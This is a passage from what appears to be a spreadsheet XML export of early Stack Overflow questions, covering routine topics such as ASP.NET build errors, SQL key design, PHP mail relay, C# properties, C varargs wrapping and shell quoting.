&lt;p&gt;After creating my page twice and getting stuck I thought maybe it was still the type of controls. I created a new page and just threw some labels on it. No dice, build fails when referencing the control from the code behind. &lt;/p&gt;
&lt;p&gt;In a possibly unrelated note when I switch to the dreaded "design" mode of the aspx pages VS 2008 errors out and restarts. &lt;/p&gt;
&lt;p&gt;I have already put a trouble ticket in to Microsoft. I uninstalled all add-ins, I reinstalled visual studio. &lt;/p&gt;
&lt;p&gt;Anyone that wants to see my code just ask, but I am using the straight WYSIWYG visual studio "new aspx page" nothing fancy.&lt;/p&gt;
&lt;p&gt;I doubt anyone has run into this, but have you? &lt;/p&gt;
&lt;p&gt;Has anyone had success trouble shooting these things with Microsoft? Any way to expedite this ticket without paying??? I have been talking to a rep from Microsoft for days with no luck yet and I am dead in the water. &lt;/p&gt;
&lt;p&gt;Thank you. &lt;/p&gt;
&lt;p&gt;&lt;hr /&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Jon Limjap:&lt;/strong&gt; I edited the title to both make it clear and descriptive &lt;em&gt;and&lt;/em&gt; make sure that nobody sees it as offensive. "Foo-barred" doesn't exactly constitute a proper question title, although your question is clearly a valid one.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to provide next page of updated content?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Feel free to edit the title if you know how to formulate the question better. (Tagging is a problem as well.) The problem may be too difficult in this general form, so let us consider a concrete example.&lt;/p&gt;
&lt;p&gt;You get a screenful of stackoverflow questions by requesting &lt;code&gt;/questions ?sort=newest&lt;/code&gt; page. Next page link leads to &lt;code&gt;/questions?page=2 &amp;amp;sort=newest&lt;/code&gt;. I suppose that at server side, the request is translated into an SQL query with LIMIT clause. Problem with this approach is, that if new question were added while user browses first page, his second page will start with some questions he already saw. (If he has 10 question per page, and 10 new questions happened to be added, heâ€™ll get exactly the same content second time!)&lt;/p&gt;
&lt;p&gt;Is there an elegant way to solve this common problem? I realize that it is not that big a problem, at least not for stackoverflow, but still.&lt;/p&gt;
&lt;p&gt;The best idea I have (apart from storing request history per client) is to use &lt;code&gt;/questions?answer_id=NNN&lt;/code&gt; format. Server returns a page that starts with the requested answer, and puts the id of the first answer on the next page into next page link. There must be a way to write SQL for that, right? &lt;/p&gt;
&lt;p&gt;Is it how it usually done? Or there is a better way?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Which class design is better?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Which class design is better and why?&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;public class User
{
    public String UserName;
    public String Password;
    public String FirstName;
    public String LastName;
}
public class Employee : User
{
    public String EmployeeId;
    public String EmployeeCode;
    public String DepartmentId;
}
public class Member : User
{
    public String MemberId;
    public String JoinDate;
    public String ExpiryDate;
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;OR&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;public class User
{
    public String UserId;
    public String UserName;
    public String Password;
    public String FirstName;
    public String LastName;
}
public class Employee
{
    public User UserInfo;
    public String EmployeeId;
    public String EmployeeCode;
    public String DepartmentId;
}
public class Member
{
    public User UserInfo;
    public String MemberId;
    public String JoinDate;
    public String ExpiryDate;
}
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>One or Two Primary Keys in Many-to-Many Table?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have the following tables in my database that have a many-to-many relationship, which is expressed by a connecting table that has foreign keys to the primary keys of each of the main tables:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Widget: WidgetID (PK), Title, Price  &lt;/li&gt;
&lt;li&gt;User: UserID (PK), FirstName, LastName&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Assume that each User-Widget combination is unique. I can see two options for how to structure the connecting table that defines the data relationship:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;UserWidgets1: UserWidgetID (PK), WidgetID (FK), UserID (FK)  &lt;/li&gt;
&lt;li&gt;UserWidgets2: WidgetID (PK, FK), UserID (PK, FK)&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;Option 1 has a single column for the Primary Key. However, this seems unnecessary since the only data being stored in the table is the relationship between the two primary tables, and this relationship itself can form a unique key. Thus leading to option 2, which has a two-column primary key, but loses the one-column unique identifier that option 1 has. I could also optionally add a two-column unique index (WidgetID, UserID) to the first table.&lt;/p&gt;
&lt;p&gt;Is there any real difference between the two performance-wise, or any reason to prefer one approach over the other for structuring the UserWidgets many-to-many table?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Enforce constraint checking only when inserting rows in MSSQL?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is there a way to enforce constraint checking in MSSQL only when inserting new rows?  I.e. allow the constraints to be violated when removing/updating rows?&lt;/p&gt;
&lt;p&gt;Update: I mean FK constraint.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>php mail() not working windows 2003, IIS SMTP</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm getting this problem:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;PHP Warning: mail() [function.mail]: SMTP server response: 550 5.7.1 Unable to relay for chris.mahan@gmail.com in c:\inetpub\wwwroot\mailtest.php on line 12 
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;from this script:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;?php
$to = "chris.mahan@gmail.com";
$subject = "test";
$body = "this is a test";
if (mail($to, $subject, $body)){
    echo "mail sent";
}
else {
    echo "problem";
}
?&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;section from php.ini on the server:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;[mail function]
; For Win32 only.
SMTP = server.domain.com; for Win32 only
smtp_port = 25
; For Win32 only.
sendmail_from = support@domain.com
; For Unix only.  You may supply arguments as well (default: "sendmail -t -i").
;sendmail_path =
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;(note that "server" and "domain" refer accurately to the actual server and domain name)&lt;/p&gt;
&lt;p&gt;In IIS, SMTP is running. Under &lt;code&gt;"Access"&lt;/code&gt; tab, &lt;code&gt;"Relay"&lt;/code&gt; button, the Select which computers may relay through this virtual server is set to &lt;code&gt;checkbox "only the list below"&lt;/code&gt; and on the list is &lt;code&gt;"127.0.0.1(xxx.xxx.xxx.xxx)" (x's representing actual server IP address).&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;Server is running &lt;code&gt;Windows Server 2003 Service Pack 2&lt;/code&gt;, fully patched as of 5 PM Sept 1st 2008. I assume it is running &lt;code&gt;IIS7&lt;/code&gt; (how to check?).&lt;/p&gt;
&lt;p&gt;Any ideas?&lt;/p&gt;
&lt;p&gt;In reponse to &lt;a href="http://stackoverflow.com/users/2257/espo"&gt;Espo&lt;/a&gt;: This machine is hosted at a datacenter. We do not want to use a gmail account (were doing it, want to move away from that). Windows server 2003 comes with its own SMTP server.&lt;/p&gt;
&lt;p&gt;Update: Per Yaakov Ellis' advice, I dropped all relay restrictions and added the server  IP to the allowed list (using the reverse DNS button provided) and the thing started working.&lt;/p&gt;
&lt;p&gt;Thanks to both Espo and Yaakov for helping me out.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Generate field in MySQL SELECT</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;If I've got a table containing Field1 and Field2 can I generate a new field in the select statement? For example, a normal query would be:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;SELECT Field1, Field2 FROM Table
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;And I want to also create Field3 and have that returned in the resultset... something along the lines of this would be ideal:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;SELECT Field1, Field2, Field3 = 'Value' FROM Table
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Is this possible at all?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to find out if a file exists in C# / .NET?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I would like to test a string containing a path to a file for existence of that file (something like the &lt;code&gt;-e&lt;/code&gt; test in Perl or the &lt;code&gt;os.path.exists()&lt;/code&gt; in Python) in C#.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Programmable, secure FTP replacement</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;We need to move off traditional FTP for security purposes (it transmits it's passwords unencrypted). I am hearing SSH touted as the obvious alternative. However I have been driving FTP from an ASP.NET program interface to automate my web-site development, which is now quite a highly web-enabled process. &lt;/p&gt;
&lt;p&gt;Can anyone recommend a secure way to transfer files around which has a program interface that I can drive from ASP.NET?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>"Similar Posts" like functionality using MS SQL Server?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have lots of article store in MS SQL server 2005 database in a table called Articles-&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;"Articles (ArticleID, ArticleTitle, ArticleContent)"
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Now I want some SP or SQL query which could return me similar Article against any user's input (very much like "Similar Posts" in blogs OR "Related Questions" in stackoverflow). The matching should work on both ArticleTitle and ArticleContent. The query should be intelligent enough to sort the result on the basis on their relevancy.&lt;/p&gt;
&lt;p&gt;Is it possible to do this in MS SQL Server 2005?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What do you call the tags in Subversion and CVS that add automatic content?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Things like &lt;code&gt;$log$&lt;/code&gt; and &lt;code&gt;$version$&lt;/code&gt; which add data upon check-in to the file. I'm interested in seeing the other ones and what information they can provide, but I can't get much info unless I know what they are called.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I check job status from SSIS control flow?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Here's my scenario - I have an SSIS job that depends on another prior SSIS job to run. I need to be able to check the first job's status before I kick off the second one. It's not feasible to add the 2nd job into the workflow of the first one, as it is already way too complex. I want to be able to check the first job's status (Failed, Successful, Currently Executing) from the second one's, and use this as a condition to decide whether the second one should run, or wait for a retry. I know this can be done by querying the MSDB database on the SQL Server running the job. I'm wondering of there is an easier way, such as possibly using the WMI Data Reader Task? Anyone had this experience?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to use the SharePoint MultipleLookupField control?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I want to use the  MultipleLookupField control in a web page that will run in the context of SharePoint. I was wondering if anyone would help me with an example, which shows step by step how to use the control two display two SPField Collections.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>javascript locals()?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;In python one can get a dictionary of all local and global variables in the current scope with the built-in functions locals() and globals().  Is there some equivalent way of doing this in javascript?  For instance, I would like to do something like the following:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;var foo = function(){ alert('foo'); };
var bar = function(){ alert('bar'); };
var s = 'foo';
locals()[s](); // alerts 'foo'
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Is this at all possible, or should I just be using a local object for the lookup?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is overloading the only way to have default function arguments in C#?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is it true that the only way to handle default function arguments is through function overloading?&lt;/p&gt;
&lt;p&gt;For example, in PHP I can do this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;function foo($x, $y=0)
{
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Would the best way to handle it in C# be this?&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;void foo(int x)
{
  foo(x, 0);
}
void foo(int x, int y)
{
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;strong&gt;&lt;em&gt;&lt;a href="http://bytes.com/forum/thread224970.html" rel="nofollow"&gt;Example lifted from here&lt;/a&gt;&lt;/em&gt;&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Edit&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;&lt;em&gt;Made the C# example into actual C# (Thanks Blair Conrad)&lt;/em&gt;&lt;/strong&gt;&lt;/p&gt;
</t>
  </si>
  <si>
    <t>GUIDs as Primary Keys - Offline OLTP</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;We are working on designing an application that is typically OLTP (think: purchasing system). However, this one in particular has the need that some users will be offline, so they need to be able to download the DB to their machine, work on it, and then sync back once they're on the LAN.&lt;/p&gt;
&lt;p&gt;I would like to note that I know this has been done before, I just don't have experience with this particular model.&lt;/p&gt;
&lt;p&gt;One idea I thought about was using GUIDs as table keys. So for example, a Purchase Order would not have a number (auto-numeric) but a GUID instead, so that every offline client can generate those, and I don't have clashes when I connect back to the DB.&lt;/p&gt;
&lt;p&gt;Is this a bad idea for some reason?
Will access to these tables through the GUID key be slow?&lt;/p&gt;
&lt;p&gt;Have you had experience with these type of systems? How have you solved this problem?&lt;/p&gt;
&lt;p&gt;Thanks!&lt;br /&gt;
Daniel&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is Java "pass-by-reference" or "pass-by-value"?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I always thought Java was &lt;strong&gt;pass-by-reference&lt;/strong&gt;; however I've seen a couple of blog posts (for example, &lt;a href="http://javadude.com/articles/passbyvalue.htm"&gt;this blog&lt;/a&gt;) that claim it's not. I don't think I understand the distinction they're making. &lt;/p&gt;
&lt;p&gt;What is the explanation?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>jQuery and Prototype Selector Madness</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Both the jQuery and Prototpye JavaScript libraries refuse to allow me to use a variable to select an list item element by index number although they accept a hard coded number. &lt;/p&gt;
&lt;p&gt;For example, in Prototype this works:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;$$('li')[5].addClassName('active');
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;But this will not work no matter how I try to cast the variable as a number or integer:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;$$('li')[currentPage].addClassName('active');
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;In jQuery I get similar weirdness. This will work:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;jQuery('li').eq(5).addClass("active");
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;But this will not work again even though the value of currentPage is 5 and its type is number:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;jQuery('li').eq(currentPage).addClass("active");
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I'm trying to create a JavaScript pagination system and I need to set the class on the active page button. The list item elements are created dynamically depending upon the number of pages I need.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I get the full url of the page I am on in C#</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I need to be able to get at the full URL of the page I am on from a user control.  Is it just a matter of concatenating a bunch of Request variables together?  If so which ones? Or is there a more simpiler way?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do you give a C# Auto-Property a default value?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;How do you give a C# Auto-Property a default value?  I either use the constructor, or revert to the old syntax. &lt;/p&gt;
&lt;p&gt;&lt;strong&gt; Using the Constructor:&lt;/strong&gt;&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;class Person 
{
    public Person()
    {
        Name = "Default Name";
    }
    public string Name { get; set; }
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;strong&gt;Using normal property syntax&lt;/strong&gt;  (with a default value)&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;private string name = "Default Name";
public string Name 
{
    get 
    {
        return name;
    }
    set
    {
        name = value;
    }
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Is there a better way?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Cannot create an environment variable in the registry</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a custom installer action that updates the PATH environment, and creates an additional environment variable. Appending a directory to the existing path variable is working fine, but for some reason my attempts to create a new environment variable have been unsuccessful. The code I am using is:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;        using (RegistryKey reg = Registry.LocalMachine.OpenSubKey(@"SYSTEM\CurrentControlSet\Control\Session Manager\Environment", true))
        {
            reg.SetValue("MYVAR", "SomeVal", RegistryValueKind.ExpandString);
        }
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Edit: The OS is 32-bit XP, and as far as I can tell it is failing silently.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Smarty integration into the Code Igniter framework</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;&lt;strong&gt;A Little Background Information&lt;/strong&gt;:&lt;br&gt;
I've been looking at a few PHP framework recently, and it came down to two. The Zend Framework or CodeIgniter. &lt;/p&gt;
&lt;p&gt;I prefer CodeIgniter, because of its simple design. It's very bare bone, and it is just kept simple. The thing I don't like though is the weak template system. The template system is important for me, because I will be working with another designer. Being able to give him a good template system is a big plus.&lt;/p&gt;
&lt;p&gt;Zend was the second choice, because of the better template system that is built in. Zend is a different beast though compared to CodeIgniter. It emphasis "loose coupling between modules", but is a bigger framework. I don't like to feel like I have many things running under the hood that I never use. That is unnecessary overhead in my opinion, so I thought about putting a template system into CodeIgniter: Smarty.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Question(s)&lt;/strong&gt;: How easy/hard is the process to integrate Smarty into CodeIgniter? From my initial scan of the CodeIgniter documentation, I can see that the layout of the framework is easy enough to understand, and I anticipate no problems. I want to know if anyone has used it before, and therefore are aware of any "gotchas" you my have experienced that is going to make this harder than it should be or impossible to pull off. I also want to know if this is a good thing to do at all. Is the template system in CodeIgniter enough for normal use? Are there any other template modules that are good for CodeIgniter aside from Smarty? I better off with Zend Framework? Is any wheel being invented here? Thank you for your help! &lt;/p&gt;
</t>
  </si>
  <si>
    <t>Where do you store your database connectionstring?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I usually store my connectionstring in web.config or in the application settings of my Visual Studio project. The application I'm currently working on makes a lot of trips to the database which means it will look up the connectionstring every time. Should I be putting the connectionstring in the cache or should I be looking at storing the whole SqlConnection object in the cache to eliminate the need to open and close them all the time?&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Update&lt;/strong&gt;: Seems like the consensus is to store the connection string in a configuration file and leave the caching in the trusting hand of ADO.NET&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is there a best .NET algorithm for credit card encryption?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;The .NET &lt;code&gt;System.Security.Cryptography&lt;/code&gt; namespace has a rather bewildering collection of algorithms that I could use for encryption of credit card details. Which is the best?&lt;/p&gt;
&lt;p&gt;It clearly needs to be secure for a relatively short string. &lt;/p&gt;
&lt;p&gt;EDIT: I'm in the UK, where I understand we're OK storing encrypted credit card details so long as the three-digit CVV number is never stored. And thanks all for the great responses.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>File Access Strategy in a Multi-Threaded Environment (Web App)</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a file which is an XML representation of some data that is taken from a Web service and cached locally within a Web Application. The idea being is that this data is &lt;em&gt;very&lt;/em&gt; static, but just &lt;em&gt;might&lt;/em&gt; change. So I have set it up to cache to a file, and stuck a monitor against it to check if it has been deleted. Once deleted, the file will be refreshed from its source and rebuilt.&lt;/p&gt;
&lt;p&gt;I am now running in to problems though, because obviously in a multi-threaded environment it falls over as it is trying to access the data when it is still reading/writing the file.&lt;/p&gt;
&lt;p&gt;This is confusing me, because I added a object to lock against, and this is always locked during read/write. It was my understanding that attempted access from other threads would be told to "wait" until the lock was released?&lt;/p&gt;
&lt;p&gt;Just to let you know, I am real new to multi-threaded development, so I am totally willing to accept this is a screw up on my part :)&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Am I missing something?&lt;/strong&gt;&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;What is the best file access strategy in a multi-threaded environment?&lt;/strong&gt;
&lt;hr /&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;Edit&lt;/h3&gt;
&lt;p&gt;Sorry - I should have said this is using &lt;strong&gt;ASP.NET 2.0&lt;/strong&gt; :)&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Emacs in Windows</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;How do you run Emacs in Windows?&lt;/p&gt;
&lt;p&gt;What is the best flavor of Emacs to use in Windows, and where can I download it? And where is the .emacs file located?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Working on a Visual Studio Project with multiple users?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I just wonder what the best approach is to have multiple users work on a Project in Visual Studio 2005 Professional.&lt;/p&gt;
&lt;p&gt;We got a Solution with multiple Class Libraries, but when everyone opens the solution, we keep getting the "X was modified, Reload/Discard?" prompt all the time. Just opening one project is an obvious alternative, but I find it harder to use as you can't just see some of the other classes in other projects that way.&lt;/p&gt;
&lt;p&gt;Are there any Guidelines for Team Development with VS2005 Pro?&lt;/p&gt;
&lt;p&gt;Edit: Thanks. The current environment is a bit limited in the sense there is only 1 PC with RDP Connection, but that will change in the future. Marking the first answer as Accepted, but they are all good :)&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to detect the presence of a default recording device in the system?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;How do I detect if the system has a default recording device installed?
I bet this can be done through some calls to the Win32 API, anyone has any experience with this?&lt;/p&gt;
&lt;p&gt;I'm talking about doing this through code, not by opening the control panel and taking a look under sound options.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to wrap a function with variable length arguments?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am looking to do this in C/C++.&lt;/p&gt;
&lt;p&gt;I came across &lt;a href="http://www.swig.org/Doc1.3/Varargs.html"&gt;&lt;strong&gt;Variable Length Arguments&lt;/strong&gt;&lt;/a&gt; but this suggests a solution with Python &amp;amp; C using &lt;a href="http://sourceware.org/libffi/"&gt;libffi&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;Now, if I want to wrap &lt;code&gt;printf&lt;/code&gt; function with &lt;code&gt;myprintf&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;What I do is like below:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;void myprintf(char* fmt, ...)
{
    va_list args;
    va_start(args,fmt);
    printf(fmt,args);
    va_end(args);
}
int _tmain(int argc, _TCHAR* argv[])
{
    int a = 9;
    int b = 10;
    char v = 'C';
    myprintf("This is a number: %d and \nthis is a character: %c and \n another number: %d\n",a, v, b);
    return 0;
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;But the results are not as expected!&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;This is a number: 1244780 and
this is a character: h and
another number: 29953463
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Any point where did I miss??&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What are the differences between GPL v2 and GPL v3 licenses?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;In simple terms, what are the reasons for, and what are the differences between the GPL v2 and GPL v3 open source licenses? Explanations and references to legal terms and further descriptions would be appreciated.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Should I Keep Registering A Failure?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm working on an automated regression test suite for an app which I maintain.  While developing the automated regression test, I ran across some behavior that's almost certainly a bug.  So, for now, I've modified the automated regression test to not register a failure--it's deliberately allowing this bad behavior to go by, I mean.  &lt;/p&gt;
&lt;p&gt;So, I am interested in the opinions of others on this site.  Obviously, I'll add a bug to our defect tracking to make sure this error behavior gets fixed.  But are there any compelling reasons (either way) to either change the regression test to constantly indicate failure or leave the regression test broken and not have a failure until we can get to fixing the defective behavior?  I think of this as a 6 of one and a half-dozen of the other type of question but I ask here because I thought others may see it differently.&lt;/p&gt;
&lt;hr&gt;
&lt;p&gt;@Paul Tomblin,&lt;/p&gt;
&lt;p&gt;Just to be clear--I've never considered removing the test; I was simply considering modifying the pass/fail condition to allow for the failure without it being thrown up in my face every time I run the test. &lt;/p&gt;
&lt;p&gt;I'm a little concerned about repeated failures from known causes eventually getting treated like warnings in C++.  I know developers who see warnings in their C++ code and simply ignore them because they think they're just useless noise.  I'm afraid leaving a known failure in the regression suite might cause people to start ignoring other, possibly more important, failures. &lt;/p&gt;
&lt;p&gt;BTW, lest I be misunderstood, I consider warnings in C++ to be an important aid in crafting strong code but judging from other C++ developers I've met I think I'm in the minority.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do you properly use namespaces in C++?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I come from a Java background, where packages are used, not namespaces. I'm used to putting classes that work together to form a complete object into packages, and then reusing them later from that package. But now I'm working in C++.&lt;/p&gt;
&lt;p&gt;How do you use namespaces in C++? Do you create a single namespace for the entire application, or do you create namespaces for the major components? If so, how do you create objects from classes in other namespaces?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>is it possible to concat arguments to a command line using backquotes ?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I would like to execute an OS command from my ruby script but I want to add an argument from a ruby variable.&lt;/p&gt;
&lt;p&gt;I know that's possible by using keyword &lt;em&gt;system&lt;/em&gt; like that :&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;#!/usr/bin/env ruby
directory = '/home/paulgreg/'
system 'ls ' + directory
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;but is that possible by using the "backquotes or backticks syntax" ?
(I mean by using that syntax : &lt;code&gt;ls&lt;/code&gt;)&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Mute Specific Application in Vista</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am in need of a way to mute a specific application in Vista.&lt;/p&gt;
&lt;p&gt;Example: Mute just Firefox, but not all of the other application.  Much similar to muting a specific program from within the volume mixer in vista. &lt;/p&gt;
&lt;p&gt;If there is a program that will do this, i would appreciate that.  Otherwise if there is a way to do this, I will write a small app(Preferrably something .net).&lt;/p&gt;
&lt;p&gt;EDIT: I want to automate this procedure, possibly key-map it.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Lightweight fuzzy search library</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Can you suggest some light weight fuzzy text search library?&lt;/p&gt;
&lt;p&gt;What I want to do is to allow users to find correct data for search terms with typos.&lt;/p&gt;
&lt;p&gt;I could use full-text search engines like Lucene, but I think it's an overkill.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Edit:&lt;/strong&gt;&lt;br&gt;
To make question more clear here is a main scenario for that library:&lt;br&gt;
I have a large list of strings.  I want to be able to search in this list (something like MSVS' intellisense) but it should be possible to filter this list by string which is not present in it but close enough to some string which is in the list.&lt;br&gt;
Example:  &lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Red&lt;/li&gt;
&lt;li&gt;Green&lt;/li&gt;
&lt;li&gt;Blue&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;When I type 'Gren' or 'Geen' in a text box, I want to see 'Green' in the result set.&lt;/p&gt;
&lt;p&gt;Main language for indexed data will be English.&lt;/p&gt;
&lt;p&gt;I think that Lucene is to heavy for that task.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Update&lt;/strong&gt;:&lt;/p&gt;
&lt;p&gt;I found one product matching my requirements. It's &lt;a href="http://shuffletext.com/Highlight/"&gt;ShuffleText&lt;/a&gt;.&lt;br&gt;
Do you know any alternatives?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Why does the Bourne shell printf iterate over a %s argument?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;What's going on here?&lt;/p&gt;
&lt;p&gt;printf.sh:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;#! /bin/sh
NAME="George W. Bush"
printf "Hello, %s\n" $NAME
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Command line session:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;$ ./printf.sh
Hello, George
Hello, W.
Hello, Bush
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;UPDATE: &lt;code&gt;printf "Hello, %s\n" "$NAME"&lt;/code&gt; works. For why I'm not using &lt;code&gt;echo&lt;/code&gt;, consider&lt;/p&gt;
&lt;p&gt;echo.sh:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;#! /bin/sh
FILE="C:\tmp"
echo "Filename: $FILE"
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Command-line:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;$ ./echo.sh
Filename: C:    mp
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The &lt;a href="http://www.opengroup.org/onlinepubs/009695399/utilities/echo.html" rel="nofollow"&gt;POSIX spec for &lt;code&gt;echo&lt;/code&gt;&lt;/a&gt; says, "New applications are encouraged to use &lt;code&gt;printf&lt;/code&gt; instead of &lt;code&gt;echo&lt;/code&gt;" (for this and other reasons). &lt;/p&gt;
</t>
  </si>
  <si>
    <t>How can I unit test a Windows Service?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;.NET Framework: 2.0
Preferred Language: C#&lt;/p&gt;
&lt;p&gt;I am new to TDD (Test Driven Development).&lt;/p&gt;
&lt;p&gt;First of all, is it even possible to unit test Windows Service?&lt;/p&gt;
&lt;p&gt;Windows service class is derived from ServiceBase, which has overridable methods, &lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;OnStart &lt;/li&gt;
